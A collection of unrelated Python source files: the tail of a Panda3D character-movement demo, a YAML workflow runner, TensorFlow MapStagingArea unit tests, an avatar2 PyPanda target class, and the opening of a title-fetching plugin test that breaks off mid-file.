# if len(self.allfilename) > 1:
# os.remove(self.allfilename[0])
# del self.allfilename[0]
# playsound(self.allfilename[0])
def closeBox(self):
self.box.play('closeBox')
# Accepts arrow keys to move either the player or the menu cursor,
# Also deals with grid checking and collision detection
def move(self, task):
# Get the time that elapsed since last frame. We multiply this with
# the desired speed in order to find out with which distance to move
# in order to achieve that desired speed.
dt = globalClock.getDt()
# If the camera-left key is pressed, move camera left.
# If the camera-right key is pressed, move camera right.
if self.keyMap["cam-left"]:
self.camera.setX(self.camera, -10 * dt)
if self.keyMap["cam-right"]:
self.camera.setX(self.camera, +10 * dt)
# if base.mouseWatcherNode.hasMouse():
# mpos = base.mouseWatcherNode.getMouse() # get the mouse position
# self.maze.setP(mpos.getY() * -10)
# self.maze.setR(mpos.getX() * 10)
if base.mouseWatcherNode.hasMouse():
mpos = base.mouseWatcherNode.getMouse()
if mpos.getX() < -0.2 or mpos.getX() > 0.2:
self.camera.setX(self.camera, mpos.getX() * -5 * dt)
print('Mouse: ' ,mpos.getX())
# save ralph's initial position so that we can restore it,
# in case he falls off the map or runs into something.
startpos = self.ralph.getPos()
#print(startpos,'BY', self.box.getY(),'BX', self.box.getX())
#self.title.setText('X: {:.3f} , Y: {:.3f}, Z: {:.3f}'.format(self.ralph.getX(),self.ralph.getY(),self.ralph.getZ()))
# If a move-key is pressed, move ralph in the specified direction.
if self.keyMap["left"]:
self.ralph.setH(self.ralph.getH() + 200 * dt)
if self.keyMap["right"]:
self.ralph.setH(self.ralph.getH() - 200 * dt)
if self.keyMap["forward"]:
self.ralph.setY(self.ralph, -25 * dt)
# If ralph is moving, loop the run animation.
# If he is standing still, stop the animation.
if self.keyMap["forward"] or self.keyMap["left"] or self.keyMap["right"]:
if self.isMoving is False:
self.ralph.loop("run")
self.isMoving = True
else:
if self.isMoving:
self.ralph.stop()
self.ralph.pose("walk", 5)
self.isMoving = False
# If the camera is too far from ralph, move it closer.
# If the camera is too close to ralph, move it farther.
camvec = self.ralph.getPos() - self.camera.getPos()
camvec.setZ(0)
camdist = camvec.length()
camvec.normalize()
if camdist > 10.0:
self.camera.setPos(self.camera.getPos() + camvec * (camdist - 10))
camdist = 10.0
if camdist < 5.0:
self.camera.setPos(self.camera.getPos() - camvec * (5 - camdist))
camdist = 5.0
# Normally, we would have to call traverse() to check for collisions.
# However, the class ShowBase that we inherit from has a task to do
# this for us, if we assign a CollisionTraverser to self.cTrav.
#self.cTrav.traverse(render)
# Adjust ralph's Z coordinate. If ralph's ray hit terrain,
# update his Z. If it hit anything else, or didn't hit anything, put
# him back where he was last frame.
entries = list(self.ralphGroundHandler.getEntries())
entries.sort(key=lambda x: x.getSurfacePoint(render).getZ())
if len(entries) > 0 and entries[0].getIntoNode().getName() == "terrain":
self.ralph.setZ(entries[0].getSurfacePoint(render).getZ())
else:
self.ralph.setPos(startpos)
# Keep the camera at one foot above the terrain,
# or two feet above ralph, whichever is greater.
entries = list(self.camGroundHandler.getEntries())
entries.sort(key=lambda x: x.getSurfacePoint(render).getZ())
if len(entries) > 0 and entries[0].getIntoNode().getName() == "terrain":
self.camera.setZ(entries[0].getSurfacePoint(render).getZ() + 1.0)
if self.camera.getZ() < self.ralph.getZ() + 2.0:
self.camera.setZ(self.ralph.getZ() + 2.0)
# The camera should look in ralph's direction,
# but it should also try to stay horizontal, so look at
# a floater which hovers above ralph's head.
self.camera.lookAt(self.floater)
return task.cont
demo = RoamingRalphDemo()
demo.run()
|
Milestone1.py
|
from concurrent.futures import thread
import threading
import datetime
import time
from nbformat import write
import yaml
with open('Milestone1B.yaml', 'r') as file:
data = yaml.safe_load(file)
output = open("Milestone1B.txt", "w")
def TimeFunction(ExecutionTime):
time.sleep(ExecutionTime)
def execWorkFlow(tuple, parent, log):
time = datetime.datetime.now()
name = tuple[0]
fullName = ""
if parent == "":
fullName = name
else:
fullName = parent+"."+name
log.write(str(time)+";"+fullName+" Entry\n")
content = tuple[1]
if(content['Type'] == 'Flow'):
if(content['Execution'] == 'Sequential'):
for act in content['Activities'].items():
execWorkFlow(act, fullName, log)
else:
size = len(content['Activities'])
threads = []
for act in content['Activities'].items():
temp_thread = threading.Thread(target=execWorkFlow, args=(act, fullName, log,))
temp_thread.start()
threads.append(temp_thread)
for t in threads:
t.join()
else:
function = content['Function']
time = datetime.datetime.now()
if(function == 'TimeFunction'):
execTime = content['Inputs']['ExecutionTime']
execTime = int(execTime)
TimeFunction(execTime)
log.write(str(time)+";"+fullName+" Executing "+function+"(")
flag = False
for input in content['Inputs']:
if(flag):
log.write(",")
log.write(content['Inputs'][input])
flag = True
log.write(")\n")
else:
log.write(str(time)+";"+fullName+" Executing "+function+"()\n")
time = datetime.datetime.now()
log.write(str(time)+";"+fullName+" Exit\n")
for work in data.items():
execWorkFlow(work, "", output)
output.close()
|
map_stage_op_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test
TIMEOUT = 1
class MapStageTest(test.TestCase):
@test_util.run_deprecated_v1
def testSimple(self):
with ops.Graph().as_default() as g:
with ops.device('/cpu:0'):
x = array_ops.placeholder(dtypes.float32)
pi = array_ops.placeholder(dtypes.int64)
gi = array_ops.placeholder(dtypes.int64)
v = 2. * (array_ops.zeros([128, 128]) + x)
with ops.device(test.gpu_device_name()):
stager = data_flow_ops.MapStagingArea([dtypes.float32])
stage = stager.put(pi, [v], [0])
k, y = stager.get(gi)
y = math_ops.reduce_max(math_ops.matmul(y, y))
g.finalize()
with self.session(graph=g) as sess:
sess.run(stage, feed_dict={x: -1, pi: 0})
for i in range(10):
_, yval = sess.run([stage, y], feed_dict={x: i, pi: i + 1, gi: i})
self.assertAllClose(4 * (i - 1) * (i - 1) * 128, yval, rtol=1e-4)
@test_util.run_deprecated_v1
def testMultiple(self):
with ops.Graph().as_default() as g:
with ops.device('/cpu:0'):
x = array_ops.placeholder(dtypes.float32)
pi = array_ops.placeholder(dtypes.int64)
gi = array_ops.placeholder(dtypes.int64)
v = 2. * (array_ops.zeros([128, 128]) + x)
with ops.device(test.gpu_device_name()):
stager = data_flow_ops.MapStagingArea([dtypes.float32, dtypes.float32])
stage = stager.put(pi, [x, v], [0, 1])
k, (z, y) = stager.get(gi)
y = math_ops.reduce_max(z * math_ops.matmul(y, y))
g.finalize()
with self.session(graph=g) as sess:
sess.run(stage, feed_dict={x: -1, pi: 0})
for i in range(10):
_, yval = sess.run([stage, y], feed_dict={x: i, pi: i + 1, gi: i})
self.assertAllClose(
4 * (i - 1) * (i - 1) * (i - 1) * 128, yval, rtol=1e-4)
@test_util.run_deprecated_v1
def testDictionary(self):
with ops.Graph().as_default() as g:
with ops.device('/cpu:0'):
x = array_ops.placeholder(dtypes.float32)
pi = array_ops.placeholder(dtypes.int64)
gi = array_ops.placeholder(dtypes.int64)
v = 2. * (array_ops.zeros([128, 128]) + x)
with ops.device(test.gpu_device_name()):
stager = data_flow_ops.MapStagingArea([dtypes.float32, dtypes.float32],
shapes=[[], [128, 128]],
names=['x', 'v'])
stage = stager.put(pi, {'x': x, 'v': v})
key, ret = stager.get(gi)
z = ret['x']
y = ret['v']
y = math_ops.reduce_max(z * math_ops.matmul(y, y))
g.finalize()
with self.session(graph=g) as sess:
sess.run(stage, feed_dict={x: -1, pi: 0})
for i in range(10):
_, yval = sess.run([stage, y], feed_dict={x: i, pi: i + 1, gi: i})
self.assertAllClose(
4 * (i - 1) * (i - 1) * (i - 1) * 128, yval, rtol=1e-4)
def testColocation(self):
gpu_dev = test.gpu_device_name()
with ops.Graph().as_default() as g:
with ops.device('/cpu:0'):
x = array_ops.placeholder(dtypes.float32)
v = 2. * (array_ops.zeros([128, 128]) + x)
with ops.device(gpu_dev):
stager = data_flow_ops.MapStagingArea([dtypes.float32])
y = stager.put(1, [v], [0])
expected_name = gpu_dev if 'gpu' not in gpu_dev else '/device:GPU:0'
self.assertEqual(y.device, expected_name)
with ops.device('/cpu:0'):
_, x = stager.get(1)
y = stager.peek(1)[0]
_, z = stager.get()
self.assertEqual(x[0].device, '/device:CPU:0')
self.assertEqual(y.device, '/device:CPU:0')
self.assertEqual(z[0].device, '/device:CPU:0')
g.finalize()
@test_util.run_deprecated_v1
def testPeek(self):
with ops.Graph().as_default() as g:
with ops.device('/cpu:0'):
x = array_ops.placeholder(dtypes.int32, name='x')
pi = array_ops.placeholder(dtypes.int64)
gi = array_ops.placeholder(dtypes.int64)
p = array_ops.placeholder(dtypes.int32, name='p')
with ops.device(test.gpu_device_name()):
stager = data_flow_ops.MapStagingArea([
dtypes.int32,
], shapes=[[]])
stage = stager.put(pi, [x], [0])
peek = stager.peek(gi)
size = stager.size()
g.finalize()
n = 10
with self.session(graph=g) as sess:
for i in range(n):
sess.run(stage, feed_dict={x: i, pi: i})
for i in range(n):
self.assertEqual(sess.run(peek, feed_dict={gi: i})[0], i)
self.assertEqual(sess.run(size), 10)
@test_util.run_deprecated_v1
def testSizeAndClear(self):
with ops.Graph().as_default() as g:
with ops.device('/cpu:0'):
x = array_ops.placeholder(dtypes.float32, name='x')
pi = array_ops.placeholder(dtypes.int64)
gi = array_ops.placeholder(dtypes.int64)
v = 2. * (array_ops.zeros([128, 128]) + x)
with ops.device(test.gpu_device_name()):
stager = data_flow_ops.MapStagingArea([dtypes.float32, dtypes.float32],
shapes=[[], [128, 128]],
names=['x', 'v'])
stage = stager.put(pi, {'x': x, 'v': v})
size = stager.size()
clear = stager.clear()
g.finalize()
with self.session(graph=g) as sess:
sess.run(stage, feed_dict={x: -1, pi: 3})
self.assertEqual(sess.run(size), 1)
sess.run(stage, feed_dict={x: -1, pi: 1})
self.assertEqual(sess.run(size), 2)
sess.run(clear)
self.assertEqual(sess.run(size), 0)
@test_util.run_deprecated_v1
def testCapacity(self):
capacity = 3
with ops.Graph().as_default() as g:
with ops.device('/cpu:0'):
x = array_ops.placeholder(dtypes.int32, name='x')
pi = array_ops.placeholder(dtypes.int64, name='pi')
gi = array_ops.placeholder(dtypes.int64, name='gi')
with ops.device(test.gpu_device_name()):
stager = data_flow_ops.MapStagingArea([
dtypes.int32,
],
capacity=capacity,
shapes=[[]])
stage = stager.put(pi, [x], [0])
get = stager.get()
size = stager.size()
g.finalize()
from six.moves import queue as Queue
import threading
queue = Queue.Queue()
n = 8
with self.session(graph=g) as sess:
# Stage data in a separate thread which will block
# when it hits the staging area's capacity and thus
# not fill the queue with n tokens
def thread_run():
for i in range(n):
sess.run(stage, feed_dict={x: i, pi: i})
queue.put(0)
t = threading.Thread(target=thread_run)
t.daemon = True
t.start()
# Get tokens from the queue until a timeout occurs
try:
for i in range(n):
queue.get(timeout=TIMEOUT)
except Queue.Empty:
pass
# Should've timed out on the iteration 'capacity'
if not i == capacity:
self.fail("Expected to timeout on iteration '{}' "
"but instead timed out on iteration '{}' "
"Staging Area size is '{}' and configured "
"capacity is '{}'.".format(capacity, i, sess.run(size),
capacity))
# Should have capacity elements in the staging area
self.assertEqual(sess.run(size), capacity)
# Clear the staging area completely
for i in range(n):
sess.run(get)
self.assertEqual(sess.run(size), 0)
@test_util.run_deprecated_v1
def testMemoryLimit(self):
memory_limit = 512 * 1024 # 512K
chunk = 200 * 1024 # 256K
capacity = memory_limit // chunk
with ops.Graph().as_default() as g:
with ops.device('/cpu:0'):
x = array_ops.placeholder(dtypes.uint8, name='x')
pi = array_ops.placeholder(dtypes.int64, name='pi')
gi = array_ops.placeholder(dtypes.int64, name='gi')
with ops.device(test.gpu_device_name()):
stager = data_flow_ops.MapStagingArea([dtypes.uint8],
memory_limit=memory_limit,
shapes=[[]])
stage = stager.put(pi, [x], [0])
get = stager.get()
size = stager.size()
g.finalize()
from six.moves import queue as Queue
import threading
queue = Queue.Queue()
n = 8
with self.session(graph=g) as sess:
# Stage data in a separate thread which will block
# when it hits the staging area's capacity and thus
# not fill the queue with n tokens
def thread_run():
for i in range(n):
data = np.full(chunk, i, dtype=np.uint8)
sess.run(stage, feed_dict={x: data, pi: i})
queue.put(0)
t = threading.Thread(target=thread_run)
t.daemon = True
t.start()
# Get tokens from the queue until a timeout occurs
try:
for i in range(n):
queue.get(timeout=TIMEOUT)
except Queue.Empty:
pass
# Should've timed out on the iteration 'capacity'
if not i == capacity:
self.fail("Expected to timeout on iteration '{}' "
"but instead timed out on iteration '{}' "
"Staging Area size is '{}' and configured "
"capacity is '{}'.".format(capacity, i, sess.run(size),
capacity))
# Should have capacity elements in the staging area
self.assertEqual(sess.run(size), capacity)
# Clear the staging area completely
for i in range(n):
sess.run(get)
self.assertEqual(sess.run(size), 0)
@test_util.run_deprecated_v1
def testOrdering(self):
import six
import random
with ops.Graph().as_default() as g:
with ops.device('/cpu:0'):
x = array_ops.placeholder(dtypes.int32, name='x')
pi = array_ops.placeholder(dtypes.int64, name='pi')
gi = array_ops.placeholder(dtypes.int64, name='gi')
with ops.device(test.gpu_device_name()):
stager = data_flow_ops.MapStagingArea([
dtypes.int32,
],
shapes=[[]],
ordered=True)
stage = stager.put(pi, [x], [0])
get = stager.get()
size = stager.size()
g.finalize()
n = 10
with self.session(graph=g) as sess:
# Keys n-1..0
keys = list(reversed(six.moves.range(n)))
for i in keys:
sess.run(stage, feed_dict={pi: i, x: i})
self.assertEqual(sess.run(size), n)
# Check that key, values come out in ascending order
for i, k in enumerate(reversed(keys)):
get_key, values = sess.run(get)
self.assertTrue(i == k == get_key == values)
self.assertEqual(sess.run(size), 0)
@test_util.run_deprecated_v1
def testPartialDictInsert(self):
with ops.Graph().as_default() as g:
with ops.device('/cpu:0'):
x = array_ops.placeholder(dtypes.float32)
f = array_ops.placeholder(dtypes.float32)
v = array_ops.placeholder(dtypes.float32)
pi = array_ops.placeholder(dtypes.int64)
gi = array_ops.placeholder(dtypes.int64)
with ops.device(test.gpu_device_name()):
# Test barrier with dictionary
stager = data_flow_ops.MapStagingArea(
[dtypes.float32, dtypes.float32, dtypes.float32],
names=['x', 'v', 'f'])
stage_xf = stager.put(pi, {'x': x, 'f': f})
stage_v = stager.put(pi, {'v': v})
key, ret = stager.get(gi)
size = stager.size()
isize = stager.incomplete_size()
g.finalize()
with self.session(graph=g) as sess:
# 0 complete and incomplete entries
self.assertEqual(sess.run([size, isize]), [0, 0])
# Stage key 0, x and f tuple entries
sess.run(stage_xf, feed_dict={pi: 0, x: 1, f: 2})
self.assertEqual(sess.run([size, isize]), [0, 1])
# Stage key 1, x and f tuple entries
sess.run(stage_xf, feed_dict={pi: 1, x: 1, f: 2})
self.assertEqual(sess.run([size, isize]), [0, 2])
# Now complete key 0 with tuple entry v
sess.run(stage_v, feed_dict={pi: 0, v: 1})
# 1 complete and 1 incomplete entry
self.assertEqual(sess.run([size, isize]), [1, 1])
# We can now obtain tuple associated with key 0
self.assertEqual(
sess.run([key, ret], feed_dict={gi: 0}),
[0, {
'x': 1,
'f': 2,
'v': 1
}])
# 0 complete and 1 incomplete entry
self.assertEqual(sess.run([size, isize]), [0, 1])
# Now complete key 1 with tuple entry v
sess.run(stage_v, feed_dict={pi: 1, v: 3})
# We can now obtain tuple associated with key 1
self.assertEqual(
sess.run([key, ret], feed_dict={gi: 1}),
[1, {
'x': 1,
'f': 2,
'v': 3
}])
@test_util.run_deprecated_v1
def testPartialIndexInsert(self):
with ops.Graph().as_default() as g:
with ops.device('/cpu:0'):
x = array_ops.placeholder(dtypes.float32)
f = array_ops.placeholder(dtypes.float32)
v = array_ops.placeholder(dtypes.float32)
pi = array_ops.placeholder(dtypes.int64)
gi = array_ops.placeholder(dtypes.int64)
with ops.device(test.gpu_device_name()):
stager = data_flow_ops.MapStagingArea(
[dtypes.float32, dtypes.float32, dtypes.float32])
stage_xf = stager.put(pi, [x, f], [0, 2])
stage_v = stager.put(pi, [v], [1])
key, ret = stager.get(gi)
size = stager.size()
isize = stager.incomplete_size()
g.finalize()
with self.session(graph=g) as sess:
# 0 complete and incomplete entries
self.assertEqual(sess.run([size, isize]), [0, 0])
# Stage key 0, x and f tuple entries
sess.run(stage_xf, feed_dict={pi: 0, x: 1, f: 2})
self.assertEqual(sess.run([size, isize]), [0, 1])
# Stage key 1, x and f tuple entries
sess.run(stage_xf, feed_dict={pi: 1, x: 1, f: 2})
self.assertEqual(sess.run([size, isize]), [0, 2])
# Now complete key 0 with tuple entry v
sess.run(stage_v, feed_dict={pi: 0, v: 1})
# 1 complete and 1 incomplete entry
self.assertEqual(sess.run([size, isize]), [1, 1])
# We can now obtain tuple associated with key 0
self.assertEqual(sess.run([key, ret], feed_dict={gi: 0}), [0, [1, 1, 2]])
# 0 complete and 1 incomplete entry
self.assertEqual(sess.run([size, isize]), [0, 1])
# Now complete key 1 with tuple entry v
sess.run(stage_v, feed_dict={pi: 1, v: 3})
# We can now obtain tuple associated with key 1
self.assertEqual(sess.run([key, ret], feed_dict={gi: 1}), [1, [1, 3, 2]])
@test_util.run_deprecated_v1
def testPartialDictGetsAndPeeks(self):
with ops.Graph().as_default() as g:
with ops.device('/cpu:0'):
x = array_ops.placeholder(dtypes.float32)
f = array_ops.placeholder(dtypes.float32)
v = array_ops.placeholder(dtypes.float32)
pi = array_ops.placeholder(dtypes.int64)
pei = array_ops.placeholder(dtypes.int64)
gi = array_ops.placeholder(dtypes.int64)
with ops.device(test.gpu_device_name()):
# Test barrier with dictionary
stager = data_flow_ops.MapStagingArea(
[dtypes.float32, dtypes.float32, dtypes.float32],
names=['x', 'v', 'f'])
stage_xf = stager.put(pi, {'x': x, 'f': f})
stage_v = stager.put(pi, {'v': v})
peek_xf = stager.peek(pei, ['x', 'f'])
peek_v = stager.peek(pei, ['v'])
key_xf, get_xf = stager.get(gi, ['x', 'f'])
key_v, get_v = stager.get(gi, ['v'])
pop_key_xf, pop_xf = stager.get(indices=['x', 'f'])
pop_key_v, pop_v = stager.get(pi, ['v'])
size = stager.size()
isize = stager.incomplete_size()
g.finalize()
with self.session(graph=g) as sess:
# 0 complete and incomplete entries
self.assertEqual(sess.run([size, isize]), [0, 0])
# Stage key 0, x and f tuple entries
sess.run(stage_xf, feed_dict={pi: 0, x: 1, f: 2})
self.assertEqual(sess.run([size, isize]), [0, 1])
# Stage key 1, x and f tuple entries
sess.run(stage_xf, feed_dict={pi: 1, x: 1, f: 2})
self.assertEqual(sess.run([size, isize]), [0, 2])
# Now complete key 0 with tuple entry v
sess.run(stage_v, feed_dict={pi: 0, v: 1})
# 1 complete and 1 incomplete entry
self.assertEqual(sess.run([size, isize]), [1, 1])
# We can now peek at 'x' and 'f' values associated with key 0
self.assertEqual(sess.run(peek_xf, feed_dict={pei: 0}), {'x': 1, 'f': 2})
# Peek at 'v' value associated with key 0
self.assertEqual(sess.run(peek_v, feed_dict={pei: 0}), {'v': 1})
# 1 complete and 1 incomplete entry
self.assertEqual(sess.run([size, isize]), [1, 1])
# We can now obtain 'x' and 'f' values associated with key 0
self.assertEqual(
sess.run([key_xf, get_xf], feed_dict={gi: 0}), [0, {
'x': 1,
'f': 2
}])
# Still have 1 complete and 1 incomplete entry
self.assertEqual(sess.run([size, isize]), [1, 1])
# We can no longer get 'x' and 'f' from key 0
with self.assertRaises(errors.InvalidArgumentError) as cm:
sess.run([key_xf, get_xf], feed_dict={gi: 0})
exc_str = ("Tensor at index '0' for key '0' " 'has already been removed.')
self.assertIn(exc_str, cm.exception.message)
# Obtain 'v' value associated with key 0
self.assertEqual(
sess.run([key_v, get_v], feed_dict={gi: 0}), [0, {
'v': 1
}])
# 0 complete and 1 incomplete entry
self.assertEqual(sess.run([size, isize]), [0, 1])
# Now complete key 1 with tuple entry v
sess.run(stage_v, feed_dict={pi: 1, v: 1})
# 1 complete and 1 incomplete entry
self.assertEqual(sess.run([size, isize]), [1, 0])
# Pop without key to obtain 'x' and 'f' values associated with key 1
self.assertEqual(sess.run([pop_key_xf, pop_xf]), [1, {'x': 1, 'f': 2}])
# still 1 complete and 1 incomplete entry
self.assertEqual(sess.run([size, isize]), [1, 0])
# We can now obtain 'x' and 'f' values associated with key 1
self.assertEqual(
sess.run([pop_key_v, pop_v], feed_dict={pi: 1}), [1, {
'v': 1
}])
# Nothing is left
self.assertEqual(sess.run([size, isize]), [0, 0])
@test_util.run_deprecated_v1
def testPartialIndexGets(self):
with ops.Graph().as_default() as g:
with ops.device('/cpu:0'):
x = array_ops.placeholder(dtypes.float32)
f = array_ops.placeholder(dtypes.float32)
v = array_ops.placeholder(dtypes.float32)
pi = array_ops.placeholder(dtypes.int64)
pei = array_ops.placeholder(dtypes.int64)
gi = array_ops.placeholder(dtypes.int64)
with ops.device(test.gpu_device_name()):
# Test again with partial index gets
stager = data_flow_ops.MapStagingArea(
[dtypes.float32, dtypes.float32, dtypes.float32])
stage_xvf = stager.put(pi, [x, v, f], [0, 1, 2])
key_xf, get_xf = stager.get(gi, [0, 2])
key_v, get_v = stager.get(gi, [1])
size = stager.size()
isize = stager.incomplete_size()
g.finalize()
with self.session(graph=g) as sess:
# Stage complete tuple
sess.run(stage_xvf, feed_dict={pi: 0, x: 1, f: 2, v: 3})
self.assertEqual(sess.run([size, isize]), [1, 0])
# Partial get using indices
self.assertEqual(
sess.run([key_xf, get_xf], feed_dict={gi: 0}), [0, [1, 2]])
# Still some of key 0 left
self.assertEqual(sess.run([size, isize]), [1, 0])
# Partial get of remaining index
self.assertEqual(sess.run([key_v, get_v], feed_dict={gi: 0}), [0, [3]])
# All gone
self.assertEqual(sess.run([size, isize]), [0, 0])
@test_util.run_deprecated_v1
def testNonScalarKeyOrderedMap(self):
with ops.Graph().as_default() as g:
x = array_ops.placeholder(dtypes.float32)
v = 2. * (array_ops.zeros([128, 128]) + x)
t = data_flow_ops.gen_data_flow_ops.ordered_map_stage(
key=constant_op.constant(value=[1], shape=(1, 3), dtype=dtypes.int64),
indices=np.array([[6]]),
values=[x, v],
dtypes=[dtypes.int64],
capacity=0,
memory_limit=0,
container='container1',
shared_name='',
name=None)
g.finalize()
with self.session(graph=g) as sess:
with self.assertRaisesRegex(errors.InvalidArgumentError,
'key must be an int64 scalar'):
sess.run(t, feed_dict={x: 1})
@test_util.run_deprecated_v1
def testNonScalarKeyUnorderedMap(self):
with ops.Graph().as_default() as g:
x = array_ops.placeholder(dtypes.float32)
v = 2. * (array_ops.zeros([128, 128]) + x)
t = data_flow_ops.gen_data_flow_ops.map_stage(
key=constant_op.constant(value=[1], shape=(1, 3), dtype=dtypes.int64),
indices=np.array([[6]]),
values=[x, v],
dtypes=[dtypes.int64],
capacity=0,
memory_limit=0,
container='container1',
shared_name='',
name=None)
g.finalize()
with self.session(graph=g) as sess:
with self.assertRaisesRegex(errors.InvalidArgumentError,
'key must be an int64 scalar'):
sess.run(t, feed_dict={x: 1})
if __name__ == '__main__':
test.main()
|
pypanda_target.py
|
from threading import Thread
from time import sleep
from avatar2.targets import PandaTarget
from ..watchmen import watch
from .target import action_valid_decorator_factory, TargetStates
class PyPandaTarget(PandaTarget):
'''
The pypanda target is a PANDA target, but uses pypanda to run the framework.
'''
def __init__(self, *args, **kwargs):
try:
import pandare
except ImportError:
raise RuntimeError(("PyPanda could not be found! for installation, "
"please follow the steps at https://github.com/"
"panda-re/panda/blob/master/panda/pypanda/docs/USAGE.md"))
super(PyPandaTarget, self).__init__(*args, **kwargs)
self.cb_ctx = 0
self.pypanda = None
self._thread = None
def shutdown(self):
if self._thread.is_alive():
self.protocols.execution.remote_disconnect()
self.pypanda.end_analysis()
# Wait for shutdown
while self._thread.is_alive():
sleep(.01)
@watch('TargetInit')
def init(self, **kwargs):
from pandare import Panda
arch = self.avatar.arch.qemu_name
args = self.assemble_cmd_line()[1:]
self.avatar.save_config(file_name=self.qemu_config_file,
config=self.generate_qemu_config())
self.pypanda = Panda(arch=arch, extra_args=args, **kwargs)
# adjust panda's signal handler to avatar2-standard
def SigHandler(SIG,a,b):
if self.state == TargetStates.RUNNING:
self.stop()
self.wait()
self.avatar.sigint_handler()
self.pypanda.setup_internal_signal_handler(signal_handler=SigHandler)
self._thread = Thread(target=self.pypanda.run, daemon=True)
self._thread.start()
self._connect_protocols()
def register_callback(self, callback, function, name=None, enabled=True,
procname=None):
pp = self.pypanda
if hasattr(pp.callback, callback) is False:
raise Exception("Callback %s not found!" % callback)
cb = getattr(pp.callback, callback)
if name == None:
name = 'avatar_cb_%d' % self.cb_ctx
self.cb_ctx += 1
pp.register_callback(cb, cb(function), name, enabled=enabled,
procname=procname)
return name
def disable_callback(self, name):
pp = self.pypanda
pp.disable_callback(name)
def enable_callback(self, name):
pp = self.pypanda
pp.enable_callback(name)
def add_hook(self, address, function, enabled=True,
kernel=True, asid=None, cb_type="before_block_exec"):
'''
This function registers hook at specified address with pypanda
:param address: Address to be hooked.
:param function: Function to be executed at specified address.
If the cb_type is "before_block_exec" (the default),
the arguments passed to that functions are cdata
pointer to the following structs:
cpustate *, TranslationBlock *, hook *
'''
self.pypanda.hook(address, enabled=enabled, kernel=kernel, asid=asid,
cb_type=cb_type)(function)
@watch('TargetReadMemory')
@action_valid_decorator_factory(TargetStates.STOPPED, 'memory')
def read_memory(self, address, size, num_words=1, raw=False):
if raw == False:
return self.protocols.memory.read_memory(address, size, num_words)
else:
return self.pypanda.physical_memory_read(address,size*num_words)
@watch('TargetWriteMemory')
@action_valid_decorator_factory(TargetStates.STOPPED, 'memory')
def write_memory(self, address, size, value, num_words=1, raw=False):
if raw == False:
return self.protocols.memory.write_memory(address, size, value, num_words=num_words)
else:
return self.pypanda.physical_memory_write(address, value)
def delete_callback(self, name):
return self.pypanda.delete_callback(name)
|
test_titlegiver.py
|
# coding=utf-8
import threading
import urllib
import os
import json
import urllib.parse
import unittest
import http.server
from plugins.titlegiver.titlegiver import Titlegiver
__author__ = "tigge"
__author__ = "reggna"
class Handler(http.server.BaseHTTPRequestHandler):
def redirect(self):
count = int(self.url_queries["count"][0])
url = self.url_queries["url"][0]
if count > 1:
url = "redirect?count={0}&url={1}".format(
count - 1, self.url_queries["url"][0]
)
self.send_response(301)
self.send_header("Location", url)
self.end_headers()
self.wfile.write(
"<html><head><title>Redirect</title></head><body>See {0}</body></html>".format(
url
).encode(
"utf-8"
)
)
def page(self):
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(
"<html><head><title>Simple</title></head><body>Simple</body></html>".encode(
"utf-8"
)
)
def pages(self):
self.send_response(200)
dir = os.path.join("..", os.path.dirname(__file__))
# Read headers from JSON dict, .headers extension
try:
with open(dir + "/" + urllib.parse.unquote(self.path) + ".header") as fp:
for header, value in json.load(fp).items():
self.send_header(header, value)
# Default headers, if not found
except IOError:
self.send_header("Content-Type", "text/html; charset=utf-8")
self.end_headers()
ip = "localhost:{}".format(self.server.server_port).encode("ascii")
with open(dir + "/" + urllib.parse.unquote(self.path), "br") as fp:
self.wfile.write(fp.read().replace("$ADDRESS".encode("ascii"), ip))
def do_GET(self):
self.url_parts = urllib.parse.urlparse(self.path)
self.url_queries = urllib.parse.parse_qs(self.url_parts.query)
if self.url_parts.path == "/redirect":
self.redirect()
elif self.url_parts.path == "/page":
self.page()
elif self.url_parts.path.startswith("/pages"):
self.pages()
def log_message(self, format, *args):
return
class TitlegiverTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.http_server = http.server.HTTPServer(("", 0), Handler)
cls.http_server_thread = threading.Thread(target=cls.http_server.serve_forever)
cls.http_server_thread.start()
cls.URL = "http://localhost:{}".format(cls.http_server.server_port)
@classmethod
def tearDownClass(cls):
cls.http_server.shutdown()
cls.http_server.server_close()
cls.http_server_thread.join()
def test_redirect(self):
url = self.URL + "/page"
result = Titlegiver.get_title_from_url(
self.URL + "/redirect?count=10&url={0}".format(url)
)
self.assertEqual(result, u"Simple")
def test_meta_redirect(self):
result = Titlegiver.get_title_from_url(self.URL + "/pages/meta_redirect")
self.assertEqual(result, u"Simple")
def test_meta_redirect_in_noscript(self):
result = Titlegiver.get_title_from_url(
self.URL + "/pages/meta_redirect_in_noscript"
)
self.assertEqual(result, u"Title without refreshing")
def test_specialchars(self):
result = Titlegiver.get_title_from_url(self.URL + "/pages/specialchar")
self.assertEqual(
result,
u"Title with special characters §½!\"@#£¤$%&/{([)]=}+?\`´'^~*'<>|,;.:-_",
)
def test_linebreaks(self):
result = Titlegiver.get_title_from_url(self.URL + "/pages/linebreaks")
self.assertEqual(result, u"Title with line breaks and carriage returns")
def test_attributes(self):
result = Titlegiver.get_title_from_url(self.URL + "/pages/attributes")
self.assertEqual(result, u'Title with attribute id="pageTitle"')
def test_entities(self):
result = Titlegiver.get_title_from_url(self.URL + "/pages/entities")
self.assertEqual(
result,
u"Title with entities. "
u'XML: "& '
u"HTML: <Å©†♥ "
u"Int/hex: Hello "
u"Invalid: #k;�&fail;",
)
def test_nonascii(self):
result = Titlegiver.get_title_from_url(self.URL + "/pages/nönàscii")
self.assertEqual(result, u"Page with nön-àscii path")
def test_encoding_bom(self):
result = Titlegiver.get_title_from_url(self.URL + "/pages/encoding_bom")
self.assertEqual(result, u"Gådzölla - ゴジラ")
def test_encoding_xmldecl(self):
